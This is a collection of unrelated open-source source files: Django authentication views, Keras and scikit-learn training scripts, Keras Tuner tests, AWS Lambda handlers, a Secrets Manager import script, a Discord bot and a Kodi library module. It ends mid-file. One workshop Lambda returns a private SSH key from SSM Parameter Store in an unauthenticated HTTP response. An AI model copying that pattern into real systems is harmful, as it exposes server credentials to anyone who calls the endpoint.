request_deserializer=proto_dot_faiss__pb2.deleteVecRequest.FromString,
response_serializer=proto_dot_faiss__pb2.deleteVecResponse.SerializeToString,
),
'getNearest': grpc.unary_unary_rpc_method_handler(
servicer.getNearest,
request_deserializer=proto_dot_faiss__pb2.getNearestRequest.FromString,
response_serializer=proto_dot_faiss__pb2.getNearestResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'faiss.FaissService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
|
{
"source": "jeswinroy/edjango",
"score": 2
}
|
#### File: mysite/pages/views.py
```python
from django.shortcuts import render,redirect
from django.http import HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
def home_view(request):
return render(request, 'pages/index.html')
def register_view(request):
if request.method == 'POST':
full_name = request.POST['full_name']
email = request.POST['email']
password = request.POST['password']
user = User.objects.create_user(email,email=email,password=password)
user.save()
login(request,user)
return redirect('/dashboard')
return render(request, 'pages/register.html')
def login_view(request):
if request.method == 'POST':
email = request.POST['email']
password = request.POST['password']
user=authenticate(request, username=email, password=password)
if user is not None:
login(request,user)
return redirect('/dashboard')
return render(request, 'pages/login.html')
```
|
{
"source": "Jet132/keras-tuner",
"score": 3
}
|
#### File: keras_tuner/integration_tests/end_to_end_test.py
```python
import numpy as np
import pytest
import tensorflow as tf
from tensorflow import keras
import keras_tuner
def get_data():
"""Create random but repetitive dummy MNIST data."""
x = np.random.randint(0, 255, size=(1000, 28, 28))
y = np.random.randint(0, 9, size=(1000,))
train_x = np.repeat(x, repeats=10, axis=0)
train_y = np.repeat(y, repeats=10, axis=0)
val_x, val_y = x, y
rng_state = np.random.get_state()
np.random.shuffle(train_x)
np.random.set_state(rng_state)
np.random.shuffle(train_y)
return (train_x, train_y), (val_x, val_y)
def build_model(hp):
inputs = keras.Input(shape=(28, 28))
x = keras.layers.Reshape((28 * 28,))(inputs)
for i in range(hp.Int("num_layers", 1, 4)):
x = keras.layers.Dense(
units=hp.Int("units_" + str(i), 128, 512, 32, default=256),
activation="relu",
)(x)
x = keras.layers.Dropout(hp.Float("dp", 0.0, 0.6, 0.1, default=0.5))(x)
outputs = keras.layers.Dense(10, activation="softmax")(x)
model = keras.Model(inputs, outputs)
model.compile(
optimizer=keras.optimizers.Adam(
hp.Choice("learning_rate", [1e-2, 2e-3, 5e-4])
),
loss="sparse_categorical_crossentropy",
metrics=["accuracy"],
)
return model
@pytest.mark.parametrize(
"distribution_strategy", [tf.distribute.OneDeviceStrategy("/cpu:0"), None]
)
def test_end_to_end_workflow(tmp_path, distribution_strategy):
tf.get_logger().setLevel("ERROR")
(x, y), (val_x, val_y) = get_data()
x = x.astype("float32") / 255.0
val_x = val_x.astype("float32") / 255.0
tuner = keras_tuner.tuners.RandomSearch(
build_model,
objective="val_accuracy",
max_trials=20,
distribution_strategy=distribution_strategy,
directory=tmp_path,
)
tuner.search_space_summary()
tuner.search(
x=x,
y=y,
epochs=10,
batch_size=128,
callbacks=[keras.callbacks.EarlyStopping(patience=2)],
validation_data=(val_x, val_y),
)
tuner.results_summary()
best_model = tuner.get_best_models(1)[0]
val_loss, val_acc = best_model.evaluate(val_x, val_y)
assert val_acc > 0.955
if __name__ == "__main__":
test_end_to_end_workflow("test_dir", None)
```
|
{
"source": "jet1350/application-migration-with-aws-workshop",
"score": 2
}
|
#### File: src/get_ssh_key_from_ssm/index.py
```python
import boto3
KEY_NAME = "linux_servers_ssh_key"
def get_ssh_pem(AWS_REGION, sts_session):
""" Return parameter from SSM Parameter Store"""
ssm_client = sts_session.client("ssm")
ssh_key = ssm_client.get_parameter(Name=KEY_NAME)['Parameter']['Value']
return ssh_key
def lambda_handler(event, context):
""" Get SSM parameter and return it in HTTP-ready response """
session = boto3.session.Session()
return {
"statusCode": 200,
"body": get_ssh_pem('us-east-1', session),
"headers": {"content-type": "text/plain"}
}
```
|
{
"source": "jet2018/kennys_final",
"score": 3
}
|
#### File: kennys_final/authentication/views.py
```python
from django.contrib.auth.decorators import login_required
from authentication.models import AddEmployer
from employees.models import DailyPerfomance
# Create your views here.
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User, auth
from django.forms.utils import ErrorList
from django.http import HttpResponse
from .forms import LoginForm, SignUpForm
import datetime
now = datetime.datetime.now()
today = now.date()
time = now.time()
year = now.year
month = now.month
day = now.day
# yesto = now.day-1
# print(yesto)
# login view. Handles caapturing users entry time
def login_view(request):
form = LoginForm(request.POST or None)
msg = None
if request.method == "POST":
if form.is_valid():
username = form.cleaned_data.get("username")
password = form.cleaned_data.get("password")
user = authenticate(username=username, password=password)
if user is not None:
# login the user
emp = AddEmployer.objects.get(user=user)
# check if the user had logged in sometime back today
try:
cur_user_instance = User.objects.get(username=username)
msg = 'Welcome back, '+username
except User.DoesNotExist:
msg = 'User does not exist'
# if they have, then just log them in.
if cur_user_instance.last_login and cur_user_instance.last_login.date() == today:
msg = "Welcome back "+username
login(request, user)
# otherwise, record their login time
else:
# record the their time of login
daily_check = DailyPerfomance(
Employer=emp, checked_in_at=time)
daily_check.save()
login(request, user)
return redirect("/", {"msg": msg})
else:
msg = 'Invalid credentials'
else:
msg = 'Error validating the form'
return render(request, "accounts/login.html", {"form": form, "msg": msg})
def register_user(request):
msg = None
success = False
if request.method == "POST":
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get("username")
raw_password = form.cleaned_data.get("<PASSWORD>")
user = authenticate(username=username, password=<PASSWORD>)
msg = 'User created - please <a href="/login">login</a>.'
success = True
# return redirect("/login/")
else:
msg = 'Form is not valid'
else:
form = SignUpForm()
return render(request, "accounts/register.html", {"form": form, "msg": msg, "success": success})
@login_required(login_url='/login/')
def logout(request):
try:
print(time)
# login the user
emp = AddEmployer.objects.get(user=request.user)
print(emp)
# record the their time of login
try:
check = DailyPerfomance.objects.filter(
Employer=emp, date__day=day)
daily_check = check[0]
daily_check.checked_out_at = time
daily_check.save()
auth.logout(request)
except DailyPerfomance.DoesNotExist:
pass
except AddEmployer.DoesNotExist:
pass
return redirect("/")
```
#### File: kennys_final/employees/models.py
```python
from datetime import datetime, date
from django.db.models.signals import post_save
from django.dispatch.dispatcher import receiver
from authentication.models import AddEmployer
from django.db import models
from django.db.models.base import Model
from djmoney.models.fields import MoneyField
from ckeditor.fields import RichTextField
from djmoney.models.managers import understands_money
# Create your models here.
class DailyPerfomance(models.Model):
class Meta:
verbose_name = "Daily perfomance"
verbose_name_plural = "Daily perfomances"
Employer = models.ForeignKey(AddEmployer, on_delete=models.CASCADE)
checked_in_at = models.TimeField()
checked_out_at = models.TimeField(null=True, blank=True)
daily_coverage = RichTextField(
null=True, help_text="What have you worked on today, please include -from -to times", blank=True)
date = models.DateTimeField(auto_now=True)
@property
def hours_worked(self):
hrs = 0
if self.checked_out_at:
c = datetime.combine(date.min, self.checked_out_at) - \
datetime.combine(date.min, self.checked_in_at)
secs = c.seconds
hrs = int(secs/3600)
return hrs
@property
def amount_earned(self):
get_amount = AddEmployer.objects.get(pk=self.Employer.pk)
# currency can be obtained with amount_currency
amount = get_amount.hourly_charge.amount
return 'UGX '+str(self.hours_worked * amount)
def __str__(self):
return self.Employer.user.username
```
|
{
"source": "jet76/CS-3120",
"score": 3
}
|
#### File: CS-3120/Final Project/FinalProject_TurnerJoseph.py
```python
import pandas as pd
import os
import cv2
from matplotlib import pyplot as plt
from sklearn import preprocessing
import numpy as np
from sklearn.model_selection._split import train_test_split
from keras.utils.np_utils import to_categorical
from keras.engine.sequential import Sequential
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.core import Dense, Dropout, Flatten
from keras.optimizers import SGD, adadelta, adagrad, adam
from sklearn.metrics import classification_report
from keras.losses import categorical_crossentropy
import random
from numpy.random.mtrand import randint
# path to images
dataset_path = 'cats/'
test_path = 'test/'
# network vars
epochs = 10
batch_size = 32
le = preprocessing.LabelEncoder()
# image vars
image_width, image_height = 128, 128
image_depth = 3
input_shape = (image_width, image_height, image_depth)
# image to predict
image_path = test_path + '96753206_3057061907718284_8582682320677371904_n.jpg'
#image_path = test_path + '46499754_24589.jpg'
image = cv2.imread(image_path)
image = cv2.resize(image, (image_width, image_height))
image = image / 255.0
# display image
plt.imshow(image)
# plt.show()
plt.savefig('image_plot.png')
# reshape image
image = np.array(image).reshape(-1, image_width,
image_height, image_depth)
# exit()
def get_all_breeds():
cats = pd.read_csv('cats.csv', index_col=0, usecols=[0, 1, 8])
images, breeds, data = [], [], []
class_folders = os.listdir(dataset_path)
for class_name in class_folders:
print('processing folder: ' + class_name)
image_list = os.listdir(dataset_path + class_name)
count = 0
for image_name in image_list:
id = image_name.split('_')
# print('Processing ' + class_name + ' #' + id[1])
cat = cats.loc[cats['id'] == int(id[0])]
# print(cat['id'].values[0])
if not cat.empty:
if not cat['breed'].values[0] == class_name:
print(class_name + '/' + image_name +
' listed as ' + cat['breed'].values[0])
else:
breeds.append(cat['breed'].values[0])
image = cv2.imread(dataset_path+class_name+'/' +
image_name)
image = cv2.resize(image, (image_width, image_height))
images.append(image)
count += 1
data.append([class_name, count])
return images, breeds, data
def get_breed_data(breed):
breed_path = dataset_path + breed + '/'
cats = pd.read_csv('cats.csv', index_col=0, usecols=[0, 1, 4, 5, 6, 8])
images, ages, genders, sizes = [], [], [], []
image_list = os.listdir(breed_path)
for image_name in image_list:
id = image_name.split('_')
# print('Processing ' + class_name + ' #' + id[1])
cat = cats.loc[cats['id'] == int(id[0])]
# print(cat['id'].values[0])
if not cat.empty:
if not cat['breed'].values[0] == breed:
print(breed + '/' + image_name +
' listed as ' + cat['breed'].values[0])
else:
if cat['gender'].values[0] == 'Male' or cat['gender'].values[0] == 'Female':
ages.append(cat['age'].values[0])
genders.append(cat['gender'].values[0])
sizes.append(cat['size'].values[0])
image = cv2.imread(breed_path +
image_name)
image = cv2.resize(image, (image_width, image_height))
images.append(image)
return images, ages, genders, sizes
def process_images(images):
images = np.array(images).reshape(-1, image_width,
image_height, image_depth) # reshape image array
images = images / 255 # flatten image array
return images
def process_data(data):
labels = le.fit_transform(data)
classes = le.classes_
count = len(classes)
return np.array(data), labels, classes, count, to_categorical(labels, count)
# the following model is based on 9_keras_mnist_cnn.py by <NAME>
def get_feng_jiang(count):
print('[INFO] constructing model...')
model = Sequential()
model.add(Conv2D(32, kernel_size=(5, 5), padding="same",
activation='relu',
input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (5, 5), padding="same", activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1024, activation='relu'))
model.add(Dense(count, activation='softmax'))
print('[INFO] compiling model...')
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss="categorical_crossentropy", optimizer=sgd,
metrics=["accuracy"])
return model
# the following model is based on
# Classify butterfly images with deep learning in Keras
# by <NAME>
# https://towardsdatascience.com/classify-butterfly-images-with-deep-learning-in-keras-b3101fe0f98
def get_bert_carremans(count):
print('[INFO] constructing model...')
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), strides=(1, 1), padding="same",
input_shape=input_shape, activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=2))
model.add(Conv2D(filters=64, kernel_size=(2, 2), strides=(
1, 1), padding="valid", activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=2))
model.add(Flatten())
model.add(Dense(units=64, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(units=count, activation='sigmoid'))
print('[INFO] compiling model...')
model.compile(loss='binary_crossentropy',
optimizer='rmsprop', metrics=['accuracy'])
return model
def get_joe_turner(count):
print('[INFO] constructing model...')
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.20))
model.add(Dense(count, activation='softmax'))
print('[INFO] compiling model...')
model.compile(loss="categorical_crossentropy", optimizer='adagrad',
metrics=["accuracy"])
return model
# gather breed data
print('[INFO] processing dataset...')
images, breeds, data = get_all_breeds()
# output number of images per breed
print('[INFO] dataset composition:')
for datum in data:
print(datum[0] + ': ' + str(datum[1]))
# process images
images = process_images(images)
# process breed data
breeds, breed_labels, breed_classes, breed_count, breed_categories = process_data(
breeds)
# BEGIN BREED PREDICTION
# split the breed data
breed_train_x, breed_test_x, breed_train_y, breed_test_y = train_test_split(
images, breed_categories)
print('[INFO] train test split done')
# construct breed model
model = get_feng_jiang(breed_count)
# train the model
print('[INFO] training model...')
H = model.fit(breed_train_x, breed_train_y, validation_data=(breed_test_x, breed_test_y),
epochs=epochs, batch_size=batch_size)
# evaluate the network
print("[INFO] evaluating network...")
breed_predictions = model.predict(breed_test_x, batch_size=batch_size)
breed_report = classification_report(breed_test_y.argmax(axis=1),
breed_predictions.argmax(axis=1))
print(breed_report)
predicted_breeds = model.predict_classes(image)
predicted_breed = breed_classes[predicted_breeds[0]]
print('[INFO] predicted breed: ' + predicted_breed)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy - Breed")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
# plt.show()
plt.savefig('breed_tla_plot.png')
del breed_report, breed_predictions, H, model, breed_train_x, breed_test_x, breed_train_y, breed_test_y, breeds, breed_classes, breed_count, breed_categories, images, data
# gather info for predicted breed
print('[INFO] processing ' + predicted_breed + '...')
breed_images, breed_ages, breed_genders, breed_sizes = get_breed_data(
predicted_breed)
# process predicted breed images
print('[INFO] processing ' + predicted_breed + ' images')
breed_images = process_images(breed_images)
# BEGIN AGE PREDICTION
# process age data
print('[INFO] processing ' + predicted_breed + ' ages')
ages, age_labels, age_classes, age_count, age_categories = process_data(
breed_ages)
# split data
age_train_x, age_test_x, age_train_y, age_test_y = train_test_split(
breed_images, age_categories)
print('[INFO] train test split done')
# construct age model
model = get_joe_turner(age_count)
# train age model
print('[INFO] training model...')
H = model.fit(age_train_x, age_train_y, validation_data=(age_test_x, age_test_y),
epochs=epochs, batch_size=batch_size)
# evaluate the age network
print("[INFO] evaluating network...")
age_predictions = model.predict(age_test_x, batch_size=batch_size)
age_report = classification_report(age_test_y.argmax(axis=1),
age_predictions.argmax(axis=1))
print(age_report)
# predict age
predicted_ages = model.predict_classes(image)
predicted_age = breed_ages[predicted_ages[0]]
print('[INFO] predicted age: ' + predicted_age)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy - Age")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
# plt.show()
plt.savefig('gender_tla_plot.png')
del age_report, age_predictions, H, model, age_train_x, age_test_x, age_train_y, age_test_y, ages, age_classes, age_count, age_categories
# BEGIN GENDER PREDICTION
# process gender data
print('[INFO] processing ' + predicted_breed + ' genders')
genders, gender_labels, gender_classes, gender_count, gender_categories = process_data(
breed_genders)
# split gender data
gender_train_x, gender_test_x, gender_train_y, gender_test_y = train_test_split(
breed_images, gender_categories)
print('[INFO] train test split done')
# construct gender model
model = get_bert_carremans(gender_count)
# train gender model
print('[INFO] training model...')
H = model.fit(gender_train_x, gender_train_y, validation_data=(gender_test_x, gender_test_y),
epochs=epochs, batch_size=batch_size)
# evaluate the gender network
print("[INFO] evaluating network...")
gender_predictions = model.predict(gender_test_x, batch_size=batch_size)
gender_report = classification_report(gender_test_y.argmax(axis=1),
gender_predictions.argmax(axis=1))
print(gender_report)
# predict gender
predicted_genders = model.predict_classes(image)
predicted_gender = breed_genders[predicted_genders[0]]
print('[INFO] predicted gender: ' + predicted_gender)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), H.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy - Gender")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
# plt.show()
plt.savefig('age_tla_plot.png')
del gender_report, gender_predictions, H, model, gender_train_x, gender_test_x, gender_train_y, gender_test_y, genders, gender_classes, gender_count, gender_categories
```
#### File: CS-3120/Midterm HW/MidtermHW_JoeTurner.py
```python
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn import metrics
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
def plot_confusion_matrix(cnf_matrix, name):
plt.clf()
cm = pd.DataFrame(cnf_matrix, index=np.unique(
y), columns=np.unique(y))
cm.index.name = "Actual"
cm.columns.name = "Predicted"
sns.heatmap(cm, annot=True, cmap="YlGnBu", fmt='g')
plt.title(name + ' Confusion Matrix')
plt.tight_layout()
plt.show()
# plt.savefig(name + '.png', dpi=150)
iris = pd.read_csv('iris.csv')
# optional output
# print(iris.head())
# sns.pairplot(data=iris, hue='variety', palette='Set2')
# plt.show()
# plt.savefig('pairplot.png', dpi=300)
iris = np.array(iris)
x = iris[:, :-1]
# print(x)
y = iris[:, -1]
# print(y)
le = preprocessing.LabelEncoder()
labels = le.fit_transform(y)
# print(le.classes_)
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size=0.30, random_state=0)
# Support Vector Machine
Gamma = 0.001
C = 1
model = SVC(kernel='linear', C=C, gamma=Gamma)
model.fit(x_train, y_train)
y_pred = model.predict(x_test)
svm_cnf_matrix = confusion_matrix(y_test, y_pred)
print('\nSupport Vector Machine')
print(classification_report(y_test, y_pred))
print(svm_cnf_matrix)
# plot_confusion_matrix(svm_cnf_matrix, 'SVM')
# K Nearest Neighbors
x_knn_test, x_valid, y_knn_test, y_valid = train_test_split(
x_test, y_test, test_size=0.33, random_state=0)
K = [3, 5, 7]
L = [1, 2]
best_k = best_l = best_acc = 0
for l in L:
for k in K:
model = KNeighborsClassifier(n_neighbors=k, p=l)
model.fit(x_train, y_train)
acc = metrics.accuracy_score(y_valid, model.predict(
x_valid))
# print("L" + str(l) + ", " + "k=" + str(k) + ", Accuracy=" + str(acc))
if acc > best_acc:
best_acc = acc
best_k = k
best_l = l
# print("Best: L" + str(best_l) + ", k=" + str(best_k) + ", Accuracy=" + str(best_acc))
model = KNeighborsClassifier(n_neighbors=best_k, p=best_l)
model.fit(x_train, y_train)
y_pred = model.predict(x_knn_test)
knn_cnf_matrix = metrics.confusion_matrix(y_knn_test, y_pred)
print("\nK Nearest Neighbors (L" + str(best_l) + ", k=" + str(best_k) + ")")
print(classification_report(y_knn_test, model.predict(
x_knn_test), target_names=le.classes_))
print(knn_cnf_matrix)
# plot_confusion_matrix(knn_cnf_matrix, 'KNN')
# Logistic Regression
logreg = LogisticRegression()
logreg.fit(x_train, y_train)
y_pred = logreg.predict(x_test)
lr_cnf_matrix = metrics.confusion_matrix(y_test, y_pred)
print("\nLogistic Regression")
print(classification_report(y_test, y_pred))
print(lr_cnf_matrix)
# plot_confusion_matrix(lr_cnf_matrix, 'LR')
```
|
{
"source": "jet76/IMDB-TV-Scraper",
"score": 3
}
|
#### File: tests/e2e/helper.py
```python
from typing import List
import os
def get_file_paths_and_imdb_ids(directory_name: str) -> zip:
"""directory_name should be cli or TBD"""
file_paths = []
imdb_ids = []
current_directory = os.path.dirname(__file__)
path = f'{current_directory}{os.sep}json{os.sep}{directory_name}'
for root, dirs, files in os.walk(path):
for name in files:
file_paths.append(os.path.join(root, name))
imdb_ids.append(name.split('.')[0])
return zip(file_paths, imdb_ids)
```
|
{
"source": "jet76/OMDb-Discord-Bot",
"score": 2
}
|
#### File: OMDb-Discord-Bot/omdb_bot/__main__.py
```python
import os
import discord
from discord.ext import commands
from discord.ext.commands import CommandNotFound
from dotenv import load_dotenv
from omdb import OMDb
description = '''OMDb Bot.'''
#intents = discord.Intents.default()
#intents.members = True
bot = commands.Bot(command_prefix='!', description=description)
@bot.event
async def on_ready():
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('------')
@bot.event
async def on_command_error(ctx, error):
if isinstance(error, CommandNotFound):
return
raise error
load_dotenv()
DISCORD_TOKEN = os.getenv('DISCORD_TOKEN')
OMDB_API_KEY = os.getenv('OMDB_API_KEY')
bot.add_cog(OMDb(bot, OMDB_API_KEY))
bot.run(DISCORD_TOKEN)
```
|
{
"source": "jet86/optimism",
"score": 2
}
|
#### File: watcher-api/Rinkeby/watcher_getCrossDomainMessage.py
```python
import json
import yaml
import pymysql
import boto3
import string
import random
import time
import requests
import redis
def watcher_getCrossDomainMessage(event, context):
# Parse incoming event
body = json.loads(event["body"])
receiptHash = body.get("hash")
# Read YML
with open("env.yml", 'r') as ymlfile:
config = yaml.load(ymlfile)
# Get MySQL host and port
endpoint = config.get('RDS_ENDPOINT')
user = config.get('RDS_MYSQL_NAME')
dbpassword = config.get('RDS_MYSQL_PASSWORD')
dbname = config.get('RDS_DBNAME')
con = pymysql.connect(endpoint, user=user, db=dbname,
passwd=<PASSWORD>, connect_timeout=5)
with con:
try:
cur = con.cursor()
cur.execute("""SELECT hash, blockNumber, `from`, `to`, timestamp, crossDomainMessage, crossDomainMessageFinalize, fastRelay, crossDomainMessageEstimateFinalizedTime,
l1Hash, l1BlockNumber, l1BlockHash, l1From, l1To
FROM receipt WHERE hash=%s""", (receiptHash)
)
transactionDataRaw = cur.fetchall()[0]
transactionData = {
"hash": transactionDataRaw[0],
"blockNumber": int(transactionDataRaw[1]),
"from": transactionDataRaw[2],
"to": transactionDataRaw[3],
"timestamp": transactionDataRaw[4],
"crossDomainMessage": transactionDataRaw[5],
"crossDomainMessageFinalize": transactionDataRaw[6],
"fastRelay": transactionDataRaw[7],
"crossDomainMessageEstimateFinalizedTime": transactionDataRaw[8],
"l1Hash": transactionDataRaw[9],
"l1BlockNumber": transactionDataRaw[10],
"l1BlockHash": transactionDataRaw[11],
"l1From": transactionDataRaw[12],
"l1To": transactionDataRaw[13]
}
except Exception as e:
transactionData = {}
con.close()
response = {
"statusCode": 201,
"headers": {
"Access-Control-Allow-Origin": "*",
"Access-Control-Allow-Credentials": True,
"Strict-Transport-Security": "max-age=63072000; includeSubdomains; preload",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "DENY",
"X-XSS-Protection": "1; mode=block",
"Referrer-Policy": "same-origin",
"Permissions-Policy": "*",
},
"body": json.dumps(transactionData),
}
return response
```
#### File: optimism/ops_omgx/aws-secrets-importer.py
```python
import json
import re
import subprocess
import sys, getopt
from ruamel.yaml import YAML
def main(argv):
inputfile = ''
description = "Create Secret Manager"
secret_name = ''
region = 'us-east-1'
profile = 'default'
if (len(sys.argv) <= 1 ) or (len(sys.argv) > 11):
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit()
try:
opts, args = getopt.getopt(argv,"hi:d:n:r:p:",["ifile=","name=","description=","region=","profile="])
print(opts)
except getopt.GetoptError:
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-d", "--description"):
description = arg
elif opt in ("-n", "--name"):
secret_name = arg
elif opt in ("-r", "--region"):
region = arg
elif opt in ("-p", "--profile"):
profile = arg
else:
print("Else")
print('aws-secrets-importer.py -i <inputfile> -d <description> -n <external secret name> -r <region> -p <profile> ')
sys.exit()
with open(inputfile) as vars_file:
pattern = "="
secrets = {}
for line in vars_file:
if re.search(pattern, line):
variables = line.strip()
clean = re.sub(r"^- ", "", variables)
key, value = clean.split('=')
secrets[key] = value
cmd = ['aws', 'secretsmanager', 'create-secret', '--region', region, '--profile', profile, '--description', description, '--name', secret_name, '--secret-string', json.dumps(secrets)]
result = subprocess.run(cmd)
print(result)
if __name__ == "__main__":
main(sys.argv[1:])
```
|
{
"source": "jet86/plugin.video.netflix",
"score": 2
}
|
#### File: resources/lib/Library.py
```python
import os
from shutil import rmtree
from utils import noop
try:
import cPickle as pickle
except:
import pickle
class Library:
"""Exports Netflix shows & movies to a local library folder"""
series_label = 'shows'
"""str: Label to identify shows"""
movies_label = 'movies'
"""str: Label to identify movies"""
db_filename = 'lib.ndb'
"""str: (File)Name of the store for the database dump that contains all shows/movies added to the library"""
def __init__ (self, root_folder, library_settings, log_fn=noop):
"""Takes the instances & configuration options needed to drive the plugin
Parameters
----------
root_folder : :obj:`str`
Cookie location
library_settings : :obj:`str`
User data cache location
library_db_path : :obj:`str`
User data cache location
log_fn : :obj:`fn`
optional log function
"""
self.base_data_path = root_folder
self.enable_custom_library_folder = library_settings['enablelibraryfolder']
self.custom_library_folder = library_settings['customlibraryfolder']
self.db_filepath = os.path.join(self.base_data_path, self.db_filename)
self.log = log_fn
# check for local library folder & set up the paths
lib_path = self.base_data_path if self.enable_custom_library_folder != 'true' else self.custom_library_folder
self.movie_path = os.path.join(lib_path, self.movies_label)
self.tvshow_path = os.path.join(lib_path, self.series_label)
# check if we need to setup the base folder structure & do so if needed
self.setup_local_netflix_library(source={
self.movies_label: self.movie_path,
self.series_label: self.tvshow_path
})
# load the local db
self.db = self._load_local_db(filename=self.db_filepath)
def setup_local_netflix_library (self, source):
"""Sets up the basic directories
Parameters
----------
source : :obj:`dict` of :obj:`str`
Dicitionary with directories to be created
"""
for label in source:
if not os.path.exists(source[label]):
os.makedirs(source[label])
def write_strm_file(self, path, url):
"""Writes the stream file that Kodi can use to integrate it into the DB
Parameters
----------
path : :obj:`str`
Filepath of the file to be created
url : :obj:`str`
Stream url
"""
with open(path, 'w+') as f:
f.write(url)
f.close()
def _load_local_db (self, filename):
"""Loads the local db file and parses it, creates one if not existent
Parameters
----------
filename : :obj:`str`
Filepath of db file
Returns
-------
:obj:`dict`
Parsed contents of the db file
"""
# if the db doesn't exist, create it
if not os.path.isfile(filename):
data = {self.movies_label: {}, self.series_label: {}}
self.log('Setup local library DB')
self._update_local_db(filename=filename, db=data)
return data
with open(filename) as f:
data = pickle.load(f)
if data:
return data
else:
return {}
def _update_local_db (self, filename, db):
"""Updates the local db file with new data
Parameters
----------
filename : :obj:`str`
Filepath of db file
db : :obj:`dict`
Database contents
Returns
-------
bool
Update has been successfully executed
"""
if not os.path.isdir(os.path.dirname(filename)):
return False
with open(filename, 'w') as f:
f.truncate()
pickle.dump(db, f)
return True
def movie_exists (self, title, year):
"""Checks if a movie is already present in the local DB
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Movie exists in DB
"""
movie_meta = '%s (%d)' % (title, year)
return movie_meta in self.db[self.movies_label]
def show_exists (self, title):
"""Checks if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Show exists in DB
"""
show_meta = '%s' % (title)
return show_meta in self.db[self.series_label]
def season_exists (self, title, season):
"""Checks if a season is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Season of show exists in DB
"""
if self.show_exists(title) == False:
return False
show_entry = self.db[self.series_label][title]
return season in show_entry['seasons']
def episode_exists (self, title, season, episode):
"""Checks if an episode if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Episode of show exists in DB
"""
if self.show_exists(title) == False:
return False
show_entry = self.db[self.series_label][title]
episode_entry = 'S%02dE%02d' % (season, episode)
return episode_entry in show_entry['episodes']
def add_movie (self, title, alt_title, year, video_id, build_url):
"""Adds a movie to the local db, generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
year : :obj:`int`
Release year of the show
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
movie_meta = '%s (%d)' % (title, year)
folder = alt_title
dirname = os.path.join(self.movie_path, folder)
filename = os.path.join(dirname, movie_meta + '.strm')
if os.path.exists(filename):
return
if not os.path.exists(dirname):
os.makedirs(dirname)
if self.movie_exists(title=title, year=year) == False:
self.db[self.movies_label][movie_meta] = {'alt_title': alt_title}
self._update_local_db(filename=self.db_filepath, db=self.db)
self.write_strm_file(path=filename, url=build_url({'action': 'play_video', 'video_id': video_id}))
def add_show (self, title, alt_title, episodes, build_url):
"""Adds a show to the local db, generates & persists the strm files
Note: Can also used to store complete seasons or single episodes, it all depends on
what is present in the episodes dictionary
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
episodes : :obj:`dict` of :obj:`dict`
Episodes that need to be added
build_url : :obj:`fn`
